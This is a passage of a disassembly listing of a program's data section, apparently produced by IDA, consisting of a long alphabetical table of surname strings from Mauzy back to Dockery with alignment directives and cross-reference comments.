aMauzy db 'Mauzy',0 ; DATA XREF: .data:0042E454�o
align 10h
aMattson db 'Mattson',0 ; DATA XREF: .data:0042E450�o
aMatsukata db 'Matsukata',0 ; DATA XREF: .data:0042E44C�o
align 4
aMatarazzo db 'Matarazzo',0 ; DATA XREF: .data:0042E448�o
align 10h
aMatalka db 'Matalka',0 ; DATA XREF: .data:0042E444�o
aMass db 'Mass',0 ; DATA XREF: .data:0042E440�o
align 10h
aMarubini db 'Marubini',0 ; DATA XREF: .data:0042E43C�o
align 4
aMarton db 'Marton',0 ; DATA XREF: .data:0042E438�o
align 4
aMartochio db 'Martochio',0 ; DATA XREF: .data:0042E434�o
align 10h
aMartinez db 'Martinez',0 ; DATA XREF: .data:0042E430�o
align 4
aMarques db 'Marques',0 ; DATA XREF: .data:0042E42C�o
aMargetts db 'Margetts',0 ; DATA XREF: .data:0042E428�o
align 10h
aMargalit db 'Margalit',0 ; DATA XREF: .data:0042E424�o
align 4
aMarcus db 'Marcus',0 ; DATA XREF: .data:0042E420�o
align 4
aMarchbanks db 'Marchbanks',0 ; DATA XREF: .data:0042E41C�o
align 10h
aMarch db 'March',0 ; DATA XREF: .data:0042E418�o
align 4
aMantovan db 'Mantovan',0 ; DATA XREF: .data:0042E414�o
align 4
aManganiello db 'Manganiello',0 ; DATA XREF: .data:0042E410�o
aMandel db 'Mandel',0 ; DATA XREF: .data:0042E40C�o
align 4
aManalis db 'Manalis',0 ; DATA XREF: .data:0042E408�o
aMalova db 'Malova',0 ; DATA XREF: .data:0042E404�o
align 4
aMaller db 'Maller',0 ; DATA XREF: .data:0042E400�o
align 10h
aMalatesta db 'Malatesta',0 ; DATA XREF: .data:0042E3FC�o
align 4
aMaisano db 'Maisano',0 ; DATA XREF: .data:0042E3F8�o
aMaineHershey db 'Maine-Hershey',0 ; DATA XREF: .data:0042E3F4�o
align 4
aMaier db 'Maier',0 ; DATA XREF: .data:0042E3F0�o
align 4
aMahony db 'Mahony',0 ; DATA XREF: .data:0042E3EC�o
align 4
aMaggio db 'Maggio',0 ; DATA XREF: .data:0042E3E8�o
align 4
aMadigan db 'Madigan',0 ; DATA XREF: .data:0042E3E4�o
aMacy db 'Macy',0 ; DATA XREF: .data:0042E3E0�o
align 4
aMacmillan db 'MacMillan',0 ; DATA XREF: .data:0042E3DC�o
align 4
aMackenney db 'Mackenney',0 ; DATA XREF: .data:0042E3D8�o
align 4
aMacintyre db 'Macintyre',0 ; DATA XREF: .data:0042E3D4�o
align 10h
aMaceachern db 'Maceachern',0 ; DATA XREF: .data:0042E3D0�o
align 4
aMacdonald db 'Macdonald',0 ; DATA XREF: .data:0042E3CC�o
align 4
aMaccormac db 'Maccormac',0 ; DATA XREF: .data:0042E3C8�o
align 4
aMa db 'Ma',0 ; DATA XREF: .data:0042E3C4�o
align 4
aLuzader db 'Luzader',0 ; DATA XREF: .data:0042E3C0�o
aLutcavage db 'Lutcavage',0 ; DATA XREF: .data:0042E3BC�o
align 4
aLussier db 'Lussier',0 ; DATA XREF: .data:0042E3B8�o
aLuoma db 'Luoma',0 ; DATA XREF: .data:0042E3B4�o
align 4
aLunetta db 'Lunetta',0 ; DATA XREF: .data:0042E3B0�o
aLuecke db 'Luecke',0 ; DATA XREF: .data:0042E3AC�o
align 4
aLuczkow db 'Luczkow',0 ; DATA XREF: .data:0042E3A8�o
aLuciano db 'Luciano',0 ; DATA XREF: .data:0042E3A4�o
aLucas db 'Lucas',0 ; DATA XREF: .data:0042E3A0�o
align 4
aLubin db 'Lubin',0 ; DATA XREF: .data:0042E39C�o
align 4
aLoza db 'Loza',0 ; DATA XREF: .data:0042E398�o
align 4
aLowenstein db 'Lowenstein',0 ; DATA XREF: .data:0042E394�o
align 10h
aLoveman db 'Loveman',0 ; DATA XREF: .data:0042E390�o
aLoss db 'Loss',0 ; DATA XREF: .data:0042E38C�o
align 10h
aLongworth db 'Longworth',0 ; DATA XREF: .data:0042E388�o
align 4
aLocatelli db 'Locatelli',0 ; DATA XREF: .data:0042E384�o
align 4
aLizardo db 'Lizardo',0 ; DATA XREF: .data:0042E380�o
aLivolsi db 'Livolsi',0 ; DATA XREF: .data:0042E37C�o
aLivi db 'Livi',0 ; DATA XREF: .data:0042E378�o
align 10h
aLivernash db 'Livernash',0 ; DATA XREF: .data:0042E374�o
align 4
aLitvak db 'Litvak',0 ; DATA XREF: .data:0042E370�o
align 4
aLittle db 'Little',0 ; DATA XREF: .data:0042E36C�o
align 4
aLipponen db 'Lipponen',0 ; DATA XREF: .data:0042E368�o
align 4
aLippmann db 'Lippmann',0 ; DATA XREF: .data:0042E364�o
align 4
aLinzee db 'Linzee',0 ; DATA XREF: .data:0042E360�o
align 4
aLinehan db 'Linehan',0 ; DATA XREF: .data:0042E35C�o
aLine db 'Line',0 ; DATA XREF: .data:0042E358�o
align 4
aLinder db 'Linder',0 ; DATA XREF: .data:0042E354�o
align 4
aLinda db 'Linda',0 ; DATA XREF: .data:0042E350�o
align 4
aLinares db 'Linares',0 ; DATA XREF: .data:0042E34C�o
aLim db 'Lim',0 ; DATA XREF: .data:0042E348�o
aLightfoot db 'Lightfoot',0 ; DATA XREF: .data:0042E344�o
align 4
aLight db 'Light',0 ; DATA XREF: .data:0042E340�o
align 4
aLiem db 'Liem',0 ; DATA XREF: .data:0042E33C�o
align 4
aLidano db 'Lidano',0 ; DATA XREF: .data:0042E338�o
align 4
aLiakos db 'Liakos',0 ; DATA XREF: .data:0042E334�o
align 4
aLessi db 'Lessi',0 ; DATA XREF: .data:0042E330�o
align 4
aLesser db 'Lesser',0 ; DATA XREF: .data:0042E32C�o
align 4
aLEnclos db 'l',27h,'Enclos',0 ; DATA XREF: .data:0042E328�o
align 10h
aLenard db 'Lenard',0 ; DATA XREF: .data:0042E324�o
align 4
aLeite db 'Leite',0 ; DATA XREF: .data:0042E320�o
align 10h
aLeclercq db 'Leclercq',0 ; DATA XREF: .data:0042E31C�o
align 4
aLecce db 'Lecce',0 ; DATA XREF: .data:0042E318�o
align 4
aLecar db 'Lecar',0 ; DATA XREF: .data:0042E314�o
align 4
aLawless db 'Lawless',0 ; DATA XREF: .data:0042E310�o
aLashley db 'Lashley',0 ; DATA XREF: .data:0042E30C�o
aLaserna db 'Laserna',0 ; DATA XREF: .data:0042E308�o
aLanzit db 'Lanzit',0 ; DATA XREF: .data:0042E304�o
align 4
aLantieri db 'Lantieri',0 ; DATA XREF: .data:0042E300�o
align 4
aLankes db 'Lankes',0 ; DATA XREF: .data:0042E2FC�o
align 10h
aLandes db 'Landes',0 ; DATA XREF: .data:0042E2F8�o
align 4
aLallemant db 'Lallemant',0 ; DATA XREF: .data:0042E2F4�o
; .data:0043294C�o
align 4
aLaing db 'Laing',0 ; DATA XREF: .data:0042E2F0�o
align 4
aLafler db 'Lafler',0 ; DATA XREF: .data:0042E2EC�o
; .data:off_4327E8�o
align 4
aLabunka db 'Labunka',0 ; DATA XREF: .data:0042E2E8�o
aLa db 'La',0 ; DATA XREF: .data:0042E2E4�o
align 10h
aKuwabara db 'Kuwabara',0 ; DATA XREF: .data:0042E2E0�o
align 4
aKusman db 'Kusman',0 ; DATA XREF: .data:0042E2DC�o
align 4
aKumar db 'Kumar',0 ; DATA XREF: .data:0042E2D8�o
align 4
aKuenzli db 'Kuenzli',0 ; DATA XREF: .data:0042E2D4�o
aKrysiak db 'Krysiak',0 ; DATA XREF: .data:0042E2D0�o
aKroemer db 'Kroemer',0 ; DATA XREF: .data:0042E2CC�o
aKraus db 'Kraus',0 ; DATA XREF: .data:0042E2C8�o
align 4
aKrasney db 'Krasney',0 ; DATA XREF: .data:0042E2C4�o
aKrailo db 'Krailo',0 ; DATA XREF: .data:0042E2C0�o
align 4
aKraemer db 'Kraemer',0 ; DATA XREF: .data:0042E2BC�o
aKovaks db 'Kovaks',0 ; DATA XREF: .data:0042E2B8�o
align 4
aKotter db 'Kotter',0 ; DATA XREF: .data:0042E2B4�o
align 4
aKorzybski db 'Korzybski',0 ; DATA XREF: .data:0042E2B0�o
align 10h
aKool db 'Kool',0 ; DATA XREF: .data:0042E2AC�o
align 4
aKonrad db 'Konrad',0 ; DATA XREF: .data:0042E2A8�o
align 10h
aKoniaris db 'Koniaris',0 ; DATA XREF: .data:0042E2A4�o
align 4
aKommer db 'Kommer',0 ; DATA XREF: .data:0042E2A0�o
align 4
aKoivumaki db 'Koivumaki',0 ; DATA XREF: .data:0042E29C�o
align 10h
aKohn db 'Kohn',0 ; DATA XREF: .data:0042E298�o
align 4
aKoch db 'Koch',0 ; DATA XREF: .data:0042E294�o
align 10h
aKobrick db 'Kobrick',0 ; DATA XREF: .data:0042E290�o
aKnuff db 'Knuff',0 ; DATA XREF: .data:0042E28C�o
align 10h
aKlint db 'Klint',0 ; DATA XREF: .data:0042E288�o
align 4
aKlinkenborg db 'Klinkenborg',0 ; DATA XREF: .data:0042E284�o
aKling db 'Kling',0 ; DATA XREF: .data:0042E280�o
align 4
aKlemperer db 'Klemperer',0 ; DATA XREF: .data:0042E27C�o
align 4
aKleinfelder db 'Kleinfelder',0 ; DATA XREF: .data:0042E278�o
aKleiman db 'Kleiman',0 ; DATA XREF: .data:0042E274�o
aKleckner db 'Kleckner',0 ; DATA XREF: .data:0042E270�o
align 4
aKittridge db 'Kittridge',0 ; DATA XREF: .data:0042E26C�o
align 4
aKirscht db 'Kirscht',0 ; DATA XREF: .data:0042E268�o
aKippenberger db 'Kippenberger',0 ; DATA XREF: .data:0042E264�o
align 4
aKinsley db 'Kinsley',0 ; DATA XREF: .data:0042E260�o
aKindall db 'Kindall',0 ; DATA XREF: .data:0042E25C�o
aKimura db 'Kimura',0 ; DATA XREF: .data:0042E258�o
align 4
aKimmett db 'Kimmett',0 ; DATA XREF: .data:0042E254�o
aKimmel db 'Kimmel',0 ; DATA XREF: .data:0042E250�o
align 4
aKhong db 'Khong',0 ; DATA XREF: .data:0042E24C�o
align 4
aKeul db 'Keul',0 ; DATA XREF: .data:0042E248�o
align 4
aKerry db 'Kerry',0 ; DATA XREF: .data:0042E244�o
align 4
aKendall db 'Kendall',0 ; DATA XREF: .data:0042E240�o
aKemsley db 'Kemsley',0 ; DATA XREF: .data:0042E23C�o
aKempton db 'Kempton',0 ; DATA XREF: .data:0042E238�o
aKelsey db 'Kelsey',0 ; DATA XREF: .data:0042E234�o
align 4
aKelker db 'Kelker',0 ; DATA XREF: .data:0042E230�o
align 4
aKeith db 'Keith',0 ; DATA XREF: .data:0042E22C�o
align 4
aKeepper db 'Keepper',0 ; DATA XREF: .data:0042E228�o
aKeenan db 'Keenan',0 ; DATA XREF: .data:0042E224�o
align 4
aKee db 'Kee',0 ; DATA XREF: .data:0042E220�o
aKawachi db 'Kawachi',0 ; DATA XREF: .data:0042E21C�o
aKasten db 'Kasten',0 ; DATA XREF: .data:0042E218�o
align 10h
aKassower db 'Kassower',0 ; DATA XREF: .data:0042E214�o
align 4
aKarpouzes db 'Karpouzes',0 ; DATA XREF: .data:0042E210�o
align 4
aKangis db 'Kangis',0 ; DATA XREF: .data:0042E20C�o
align 10h
aKamel db 'Kamel',0 ; DATA XREF: .data:0042E208�o
align 4
aKalman db 'Kalman',0 ; DATA XREF: .data:0042E204�o
align 10h
aKalinowski db 'Kalinowski',0 ; DATA XREF: .data:0042E200�o
align 4
aKalil db 'Kalil',0 ; DATA XREF: .data:0042E1FC�o
align 4
aKaligian db 'Kaligian',0 ; DATA XREF: .data:0042E1F8�o
align 10h
aKalbfleisch db 'Kalbfleisch',0 ; DATA XREF: .data:0042E1F4�o
aKafadar db 'Kafadar',0 ; DATA XREF: .data:0042E1F0�o
aKaboolian db 'Kaboolian',0 ; DATA XREF: .data:0042E1EC�o
align 10h
aKabbash db 'Kabbash',0 ; DATA XREF: .data:0042E1E8�o
aJulious db 'Julious',0 ; DATA XREF: .data:0042E1E4�o
aJuliano db 'Juliano',0 ; DATA XREF: .data:0042E1E0�o
aJucks db 'Jucks',0 ; DATA XREF: .data:0042E1DC�o
align 10h
aJorgensen db 'Jorgensen',0 ; DATA XREF: .data:0042E1D8�o
align 4
aJolly db 'Jolly',0 ; DATA XREF: .data:0042E1D4�o
align 4
aJohns db 'Johns',0 ; DATA XREF: .data:0042E1D0�o
align 4
aJohannsen db 'Johannsen',0 ; DATA XREF: .data:0042E1CC�o
align 4
aJohannesson db 'Johannesson',0 ; DATA XREF: .data:0042E1C8�o
aJewett db 'Jewett',0 ; DATA XREF: .data:0042E1C4�o
align 4
aJespersen db 'Jespersen',0 ; DATA XREF: .data:0042E1C0�o
align 4
aJenkins db 'Jenkins',0 ; DATA XREF: .data:0042E1BC�o
aJellis db 'Jellis',0 ; DATA XREF: .data:0042E1B8�o
align 4
aJeffers db 'Jeffers',0 ; DATA XREF: .data:0042E1B4�o
aJay db 'Jay',0 ; DATA XREF: .data:0042E1B0�o
aJarrell db 'Jarrell',0 ; DATA XREF: .data:0042E1AC�o
aJarnagin db 'Jarnagin',0 ; DATA XREF: .data:0042E1A8�o
align 4
aJanjigian db 'Janjigian',0 ; DATA XREF: .data:0042E1A4�o
align 4
aJamil db 'Jamil',0 ; DATA XREF: .data:0042E1A0�o
align 4
aJain db 'Jain',0 ; DATA XREF: .data:0042E19C�o
align 4
aJagoe db 'Jagoe',0 ; DATA XREF: .data:0042E198�o
align 4
aJagger db 'Jagger',0 ; DATA XREF: .data:0042E194�o
align 4
aJagers db 'Jagers',0 ; DATA XREF: .data:0042E190�o
align 4
aJackson db 'Jackson',0 ; DATA XREF: .data:0042E18C�o
aJacenko db 'Jacenko',0 ; DATA XREF: .data:0042E188�o
aIyer db 'Iyer',0 ; DATA XREF: .data:0042E184�o
align 4
aIsserman db 'Isserman',0 ; DATA XREF: .data:0042E180�o
align 10h
aIsbill db 'Isbill',0 ; DATA XREF: .data:0042E17C�o
align 4
aIsaievych db 'Isaievych',0 ; DATA XREF: .data:0042E178�o
align 4
aIsaac db 'Isaac',0 ; DATA XREF: .data:0042E174�o
align 4
aInniss db 'Inniss',0 ; DATA XREF: .data:0042E170�o
align 4
aInamura db 'Inamura',0 ; DATA XREF: .data:0042E16C�o
aIgarashi db 'Igarashi',0 ; DATA XREF: .data:0042E168�o
align 4
aIchikawa db 'Ichikawa',0 ; DATA XREF: .data:0042E164�o
align 4
aIaquinta db 'Iaquinta',0 ; DATA XREF: .data:0042E160�o
align 10h
aHyde db 'Hyde',0 ; DATA XREF: .data:0042E15C�o
align 4
aHutchings db 'Hutchings',0 ; DATA XREF: .data:0042E158�o
align 4
aHurtubise db 'Hurtubise',0 ; DATA XREF: .data:0042E154�o
align 10h
aHupp db 'Hupp',0 ; DATA XREF: .data:0042E150�o
align 4
aHuntington db 'Huntington',0 ; DATA XREF: .data:0042E14C�o
align 4
aHungerford db 'Hungerford',0 ; DATA XREF: .data:0042E148�o
align 10h
aHuidekoper db 'Huidekoper',0 ; DATA XREF: .data:0042E144�o
align 4
aHuey db 'Huey',0 ; DATA XREF: .data:0042E140�o
align 4
aHoy db 'Hoy',0 ; DATA XREF: .data:0042E13C�o
aHoward db 'Howard',0 ; DATA XREF: .data:0042E138�o
align 10h
aHottle db 'Hottle',0 ; DATA XREF: .data:0042E134�o
align 4
aHostage db 'Hostage',0 ; DATA XREF: .data:0042E130�o
aHoshida db 'Hoshida',0 ; DATA XREF: .data:0042E12C�o
aHorsley db 'Horsley',0 ; DATA XREF: .data:0042E128�o
aHopkins db 'Hopkins',0 ; DATA XREF: .data:0042E124�o
aHooker db 'Hooker',0 ; DATA XREF: .data:0042E120�o
align 10h
aHolzman db 'Holzman',0 ; DATA XREF: .data:0042E11C�o
aHolway db 'Holway',0 ; DATA XREF: .data:0042E118�o
align 10h
aHolter db 'Holter',0 ; DATA XREF: .data:0042E114�o
align 4
aHoloien db 'Holoien',0 ; DATA XREF: .data:0042E110�o
aHolmes db 'Holmes',0 ; DATA XREF: .data:0042E10C�o
align 4
aHokoda db 'Hokoda',0 ; DATA XREF: .data:0042E108�o
align 10h
aHokanson db 'Hokanson',0 ; DATA XREF: .data:0042E104�o
align 4
aHoffman db 'Hoffman',0 ; DATA XREF: .data:0042E100�o
aHoffer db 'Hoffer',0 ; DATA XREF: .data:0042E0FC�o
align 4
aHock db 'Hock',0 ; DATA XREF: .data:0042E0F8�o
align 4
aHoang db 'Hoang',0 ; DATA XREF: .data:0042E0F4�o
align 4
aHitchcock db 'Hitchcock',0 ; DATA XREF: .data:0042E0F0�o
align 4
aHirst db 'Hirst',0 ; DATA XREF: .data:0042E0EC�o
align 10h
aHind db 'Hind',0 ; DATA XREF: .data:0042E0E8�o
align 4
aHimmelfarb db 'Himmelfarb',0 ; DATA XREF: .data:0042E0E4�o
align 4
aHeyeck db 'Heyeck',0 ; DATA XREF: .data:0042E0E0�o
align 4
aHeubert db 'Heubert',0 ; DATA XREF: .data:0042E0DC�o
aHester db 'Hester',0 ; DATA XREF: .data:0042E0D8�o
align 4
aHerrera db 'Herrera',0 ; DATA XREF: .data:0042E0D4�o
aHernandez db 'Hernandez',0 ; DATA XREF: .data:0042E0D0�o
align 10h
aHenrichs db 'Henrichs',0 ; DATA XREF: .data:0042E0CC�o
align 4
aHenery db 'Henery',0 ; DATA XREF: .data:0042E0C8�o
align 4
aHemphill db 'Hemphill',0 ; DATA XREF: .data:0042E0C4�o
align 10h
aHelprin db 'Helprin',0 ; DATA XREF: .data:0042E0C0�o
aHellmiss db 'Hellmiss',0 ; DATA XREF: .data:0042E0BC�o
align 4
aHellman db 'Hellman',0 ; DATA XREF: .data:0042E0B8�o
aHeiland db 'Heiland',0 ; DATA XREF: .data:0042E0B4�o
aHeft db 'Heft',0 ; DATA XREF: .data:0042E0B0�o
align 4
aHeermans db 'Heermans',0 ; DATA XREF: .data:0042E0AC�o
align 4
aHazlewood db 'Hazlewood',0 ; DATA XREF: .data:0042E0A8�o
align 4
aHaynes db 'Haynes',0 ; DATA XREF: .data:0042E0A4�o
align 4
aHayes db 'Hayes',0 ; DATA XREF: .data:0042E0A0�o
align 4
aHawkes db 'Hawkes',0 ; DATA XREF: .data:0042E09C�o
align 4
aHaviaras db 'Haviaras',0 ; DATA XREF: .data:0042E098�o
align 4
aHarwell db 'Harwell',0 ; DATA XREF: .data:0042E094�o
aHartnett db 'Hartnett',0 ; DATA XREF: .data:0042E090�o
align 4
aHartmann db 'Hartmann',0 ; DATA XREF: .data:0042E08C�o
align 4
aHartman db 'Hartman',0 ; DATA XREF: .data:0042E088�o
aHarrigan db 'Harrigan',0 ; DATA XREF: .data:0042E084�o
align 4
aHarlow db 'Harlow',0 ; DATA XREF: .data:0042E080�o
align 4
aHargraves db 'Hargraves',0 ; DATA XREF: .data:0042E07C�o
align 10h
aHarding db 'Harding',0 ; DATA XREF: .data:0042E078�o
aHanssen db 'Hanssen',0 ; DATA XREF: .data:0042E074�o
aHand db 'Hand',0 ; DATA XREF: .data:0042E070�o
align 4
aHammerness db 'Hammerness',0 ; DATA XREF: .data:0042E06C�o
align 4
aHamer db 'Hamer',0 ; DATA XREF: .data:0042E068�o
align 4
aHambarzumjan db 'Hambarzumjan',0 ; DATA XREF: .data:0042E064�o
align 4
aHalpert db 'Halpert',0 ; DATA XREF: .data:0042E060�o
aHallowell db 'Hallowell',0 ; DATA XREF: .data:0042E05C�o
align 10h
aHalkias db 'Halkias',0 ; DATA XREF: .data:0042E058�o
aHaley db 'Haley',0 ; DATA XREF: .data:0042E054�o
align 10h
aHackshaw db 'Hackshaw',0 ; DATA XREF: .data:0042E050�o
align 4
aHackman db 'Hackman',0 ; DATA XREF: .data:0042E04C�o
aHaar db 'Haar',0 ; DATA XREF: .data:0042E048�o
align 4
aHa db 'Ha',0 ; DATA XREF: .data:0042E044�o
align 10h
aGuo db 'Guo',0 ; DATA XREF: .data:0042E040�o
aGunn db 'Gunn',0 ; DATA XREF: .data:0042E03C�o
align 4
aGuenthart db 'Guenthart',0 ; DATA XREF: .data:0042E038�o
align 4
aGruppe db 'Gruppe',0 ; DATA XREF: .data:0042E034�o
align 10h
aGruner db 'Gruner',0 ; DATA XREF: .data:0042E030�o
align 4
aGrummell db 'Grummell',0 ; DATA XREF: .data:0042E02C�o
align 4
aGrigoletto db 'Grigoletto',0 ; DATA XREF: .data:0042E028�o
align 10h
aGriffiths db 'Griffiths',0 ; DATA XREF: .data:0042E024�o
align 4
aGreenfeld db 'Greenfeld',0 ; DATA XREF: .data:0042E020�o
align 4
aGreenberg db 'Greenberg',0 ; DATA XREF: .data:0042E01C�o
align 4
aGravell db 'Gravell',0 ; DATA XREF: .data:0042E018�o
aGozzi db 'Gozzi',0 ; DATA XREF: .data:0042E014�o
align 4
aGoody db 'Goody',0 ; DATA XREF: .data:0042E010�o
align 4
aGoodearl db 'Goodearl',0 ; DATA XREF: .data:0042E00C�o
align 4
aGood db 'Good',0 ; DATA XREF: .data:0042E008�o
align 10h
aGoncalves db 'Goncalves',0 ; DATA XREF: .data:0042E004�o
align 4
aGoldfarb db 'Goldfarb',0 ; DATA XREF: .data:0042E000�o
align 4
aGlendon db 'Glendon',0 ; DATA XREF: .data:0042DFFC�o
aGlegg db 'Glegg',0 ; DATA XREF: .data:0042DFF8�o
align 4
aGleason db 'Gleason',0 ; DATA XREF: .data:0042DFF4�o
aGist db 'Gist',0 ; DATA XREF: .data:0042DFF0�o
align 4
aGillispie db 'Gillispie',0 ; DATA XREF: .data:0042DFEC�o
align 4
aGill db 'Gill',0 ; DATA XREF: .data:0042DFE8�o
align 4
aGili db 'Gili',0 ; DATA XREF: .data:0042DFE4�o
align 4
aGilbert db 'Gilbert',0 ; DATA XREF: .data:0042DFE0�o
aGibson db 'Gibson',0 ; DATA XREF: .data:0042DFDC�o
align 4
aGibbens db 'Gibbens',0 ; DATA XREF: .data:0042DFD8�o
aGhorai db 'Ghorai',0 ; DATA XREF: .data:0042DFD4�o
align 4
aGerrett db 'Gerrett',0 ; DATA XREF: .data:0042DFD0�o
aGeorgi db 'Georgi',0 ; DATA XREF: .data:0042DFCC�o
align 4
aGemberling db 'Gemberling',0 ; DATA XREF: .data:0042DFC8�o
align 10h
aGeller db 'Geller',0 ; DATA XREF: .data:0042DFC4�o
align 4
aGaronna db 'Garonna',0 ; DATA XREF: .data:0042DFC0�o
aGarman db 'Garman',0 ; DATA XREF: .data:0042DFBC�o
align 4
aGarfield db 'Garfield',0 ; DATA XREF: .data:0042DFB8�o
align 4
aGambini db 'Gambini',0 ; DATA XREF: .data:0042DFB4�o
aGalwey db 'Galwey',0 ; DATA XREF: .data:0042DFB0�o
align 4
aGaleotti db 'Galeotti',0 ; DATA XREF: .data:0042DFAC�o
align 10h
aGaggiotti db 'Gaggiotti',0 ; DATA XREF: .data:0042DFA8�o
align 4
aGabrielli db 'Gabrielli',0 ; DATA XREF: .data:0042DFA4�o
align 4
aFusaro db 'Fusaro',0 ; DATA XREF: .data:0042DFA0�o
align 10h
aFurth db 'Furth',0 ; DATA XREF: .data:0042DF9C�o
align 4
aFuller db 'Fuller',0 ; DATA XREF: .data:0042DF98�o
align 10h
aFujiiAbe db 'Fujii-Abe',0 ; DATA XREF: .data:0042DF94�o
align 4
aFrye db 'Frye',0 ; DATA XREF: .data:0042DF90�o
align 4
aFryberger db 'Fryberger',0 ; DATA XREF: .data:0042DF8C�o
align 10h
aFrowiss db 'Frowiss',0 ; DATA XREF: .data:0042DF88�o
aFrisken db 'Frisken',0 ; DATA XREF: .data:0042DF84�o
aFriedland db 'Friedland',0 ; DATA XREF: .data:0042DF80�o
align 4
aFried db 'Fried',0 ; DATA XREF: .data:0042DF7C�o
align 4
aFreundlich db 'Freundlich',0 ; DATA XREF: .data:0042DF78�o
align 10h
aFreid db 'Freid',0 ; DATA XREF: .data:0042DF74�o
align 4
aFrazierDavis db 'Frazier-Davis',0 ; DATA XREF: .data:0042DF70�o
align 4
aFranz db 'Franz',0 ; DATA XREF: .data:0042DF6C�o
align 10h
aFranklinKenea db 'Franklin-Kenea',0 ; DATA XREF: .data:0042DF68�o
align 10h
aFrancisco db 'Francisco',0 ; DATA XREF: .data:0042DF64�o
align 4
aFossi db 'Fossi',0 ; DATA XREF: .data:0042DF60�o
align 4
aFossey db 'Fossey',0 ; DATA XREF: .data:0042DF5C�o
align 4
aFortier db 'Fortier',0 ; DATA XREF: .data:0042DF58�o
aFortes db 'Fortes',0 ; DATA XREF: .data:0042DF54�o
align 4
aForester db 'Forester',0 ; DATA XREF: .data:0042DF50�o
align 4
aFolks db 'Folks',0 ; DATA XREF: .data:0042DF4C�o
align 10h
aFlores db 'Flores',0 ; DATA XREF: .data:0042DF48�o
align 4
aFlier db 'Flier',0 ; DATA XREF: .data:0042DF44�o
align 10h
aFitzmaurice db 'Fitzmaurice',0 ; DATA XREF: .data:0042DF40�o
aFisk db 'Fisk',0 ; DATA XREF: .data:0042DF3C�o
align 4
aFiorina db 'Fiorina',0 ; DATA XREF: .data:0042DF38�o
aFinnegan db 'Finnegan',0 ; DATA XREF: .data:0042DF34�o
align 4
aFinkelstein db 'Finkelstein',0 ; DATA XREF: .data:0042DF30�o
aFink db 'Fink',0 ; DATA XREF: .data:0042DF2C�o
align 4
aField db 'Field',0 ; DATA XREF: .data:0042DF28�o
align 4
aFido db 'Fido',0 ; DATA XREF: .data:0042DF24�o
align 4
aFeuer db 'Feuer',0 ; DATA XREF: .data:0042DF20�o
align 4
aFerriell db 'Ferriell',0 ; DATA XREF: .data:0042DF1C�o
align 10h
aFerrante db 'Ferrante',0 ; DATA XREF: .data:0042DF18�o
align 4
aFernandes db 'Fernandes',0 ; DATA XREF: .data:0042DF14�o
align 4
aFernald db 'Fernald',0 ; DATA XREF: .data:0042DF10�o
aFeldman db 'Feldman',0 ; DATA XREF: .data:0042DF0C�o
aFejzo db 'Fejzo',0 ; DATA XREF: .data:0042DF08�o
align 10h
aFeigenbaum db 'Feigenbaum',0 ; DATA XREF: .data:0042DF04�o
align 4
aFates db 'Fates',0 ; DATA XREF: .data:0042DF00�o
align 4
aFasso db 'Fasso',27h,0 ; DATA XREF: .data:0042DEFC�o
align 4
aFarren db 'Farren',0 ; DATA XREF: .data:0042DEF8�o
align 4
aFarone db 'Farone',0 ; DATA XREF: .data:0042DEF4�o
align 4
aFaris db 'Faris',0 ; DATA XREF: .data:0042DEF0�o
align 4
aFalorsi db 'Falorsi',0 ; DATA XREF: .data:0042DEEC�o
aFalcoAcosta db 'Falco-Acosta',0 ; DATA XREF: .data:0042DEE8�o
align 4
aFaioes db 'Faioes',0 ; DATA XREF: .data:0042DEE4�o
align 4
aFagan db 'Fagan',0 ; DATA XREF: .data:0042DEE0�o
align 4
aFabbris db 'Fabbris',0 ; DATA XREF: .data:0042DEDC�o
aEverett db 'Everett',0 ; DATA XREF: .data:0042DED8�o
aEuripides db 'Euripides',0 ; DATA XREF: .data:0042DED4�o
align 4
aEtter db 'Etter',0 ; DATA XREF: .data:0042DED0�o
align 10h
aEstes db 'Estes',0 ; DATA XREF: .data:0042DECC�o
align 4
aEspinoza db 'Espinoza',0 ; DATA XREF: .data:0042DEC8�o
align 4
aErez db 'Erez',0 ; DATA XREF: .data:0042DEC4�o
align 4
aErdos db 'Erdos',0 ; DATA XREF: .data:0042DEC0�o
align 4
aErdman db 'Erdman',0 ; DATA XREF: .data:0042DEBC�o
align 4
aErbach db 'Erbach',0 ; DATA XREF: .data:0042DEB8�o
align 4
aEppling db 'Eppling',0 ; DATA XREF: .data:0042DEB4�o
aEnyeart db 'Enyeart',0 ; DATA XREF: .data:0042DEB0�o
aEncinas db 'Encinas',0 ; DATA XREF: .data:0042DEAC�o
aElvis db 'Elvis',0 ; DATA XREF: .data:0042DEA8�o
align 4
aElmerick db 'Elmerick',0 ; DATA XREF: .data:0042DEA4�o
align 10h
aElmendorf db 'Elmendorf',0 ; DATA XREF: .data:0042DEA0�o
align 4
aEliasson db 'Eliasson',0 ; DATA XREF: .data:0042DE9C�o
align 4
aEickenhorst db 'Eickenhorst',0 ; DATA XREF: .data:0042DE98�o
aEdward db 'Edward',0 ; DATA XREF: .data:0042DE94�o
align 4
aEdner db 'Edner',0 ; DATA XREF: .data:0042DE90�o
align 4
aEdley db 'Edley',0 ; DATA XREF: .data:0042DE8C�o
align 4
aEckel db 'Eckel',0 ; DATA XREF: .data:0042DE88�o
align 4
aEbeling db 'Ebeling',0 ; DATA XREF: .data:0042DE84�o
aEardley db 'Eardley',0 ; DATA XREF: .data:0042DE80�o
aDwyer db 'Dwyer',0 ; DATA XREF: .data:0042DE7C�o
align 4
aDussault db 'Dussault',0 ; DATA XREF: .data:0042DE78�o
align 4
aDurrett db 'Durrett',0 ; DATA XREF: .data:0042DE74�o
aDuffin db 'Duffin',0 ; DATA XREF: .data:0042DE70�o
align 4
aDSouza db 'D',27h,'souza',0 ; DATA XREF: .data:0042DE6C�o
aDrinker db 'Drinker',0 ; DATA XREF: .data:0042DE68�o
aDowsland db 'Dowsland',0 ; DATA XREF: .data:0042DE64�o
align 4
aDoug db 'Doug',0 ; DATA XREF: .data:0042DE60�o
align 4
aDoty db 'Doty',0 ; DATA XREF: .data:0042DE5C�o
align 4
aDosi db 'Dosi',0 ; DATA XREF: .data:0042DE58�o
align 4
aDorf db 'Dorf',0 ; DATA XREF: .data:0042DE54�o
align 4
aDore db 'Dore',0 ; DATA XREF: .data:0042DE50�o
align 4
aDoonan db 'Doonan',0 ; DATA XREF: .data:0042DE4C�o
align 4
aDonner db 'Donner',0 ; DATA XREF: .data:0042DE48�o
align 4
aDonahue db 'Donahue',0 ; DATA XREF: .data:0042DE44�o
aDoherty db 'Doherty',0 ; DATA XREF: .data:0042DE40�o
aDockery db 'Dockery',0 ; DATA XREF: .data:0042DE3C�o
